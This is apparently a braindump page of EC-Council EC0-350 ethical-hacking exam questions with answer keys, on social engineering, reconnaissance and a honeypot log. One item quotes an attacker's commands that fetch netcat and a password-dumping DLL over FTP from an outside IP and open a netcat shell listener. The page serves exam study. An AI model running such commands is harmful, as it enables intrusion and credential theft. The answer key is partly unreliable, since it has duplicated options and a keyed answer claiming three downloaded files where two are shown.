CompTIA
Checkpoint
ISC
HP
Dell
EC-Council
EXIN
Fortinet
ITIL®
Juniper
PMI
Microsoft
VMware
Avaya
Google
Salesforce
Amazon
Palo Alto Networks
Certiport
ISC2
All Vendors
  2. Home
  3. Exams
  4. EC-Council
  5. EC0-350

Free EC0-350 Exam Braindumps (page: 6)

Page 5 of 191
PDF with 878 Questions

Your boss at ABC.com asks you what are the three stages of Reverse Social Engineering.

  1. Sabotage, advertising, Assisting
  2. Sabotage, Advertising, Covering
  3. Sabotage, Assisting, Billing
  4. Sabotage, Advertising, Covering

Answer(s): A

Explanation:

Typical social interaction dictates that if someone gives us something then it is only right for us to return the favour. This is known as reverse social engineering, when an attacker sets up a situation where the victim encounters a problem, they ask the attacker for help and once the problem is solved the victim then feels obliged to give the information requested by the attacker.



Which of the following is the best way an attacker can passively learn about technologies used in an organization?

  1. By sending web bugs to key personnel
  2. By webcrawling the organization web site
  3. By searching regional newspapers and job databases for skill sets technology hires need to possess in the organization
  4. By performing a port scan on the organization's web site

Answer(s): C

Explanation:

Note: Sending web bugs, webcrawling their site and port scanning are considered "active" attacks, the question asks "passive"



The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The file Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.
He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below:
“cmd1.exe /c open 213.116.251.162 >ftpcom”
“cmd1.exe /c echo johna2k >>ftpcom”
“cmd1.exe /c echo haxedj00 >>ftpcom”
“cmd1.exe /c echo get nc.exe >>ftpcom”
“cmd1.exe /c echo get samdump.dll >>ftpcom”
“cmd1.exe /c echo quit >>ftpcom”
“cmd1.exe /c ftp –s:ftpcom”
“cmd1.exe /c nc –l –p 6969 e-cmd1.exe”
What can you infer from the exploit given?

  1. It is a local exploit where the attacker logs in using username johna2k.
  2. There are two attackers on the system – johna2k and haxedj00.
  3. The attack is a remote exploit and the hacker downloads three files.
  4. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port.

Answer(s): C



Which of the following statements best describes the term Vulnerability?

  1. A weakness or error that can lead to a compromise
  2. An agent that has the potential to take advantage of a weakness
  3. An action or event that might prejudice security
  4. The loss potential of a threat.

Answer(s): A

Explanation:

Vulnerabilities are all weaknesses that can be exploited.






Post your Comments and Discuss EC-Council EC0-350 exam with other Community members:

EC0-350 Discussions & Posts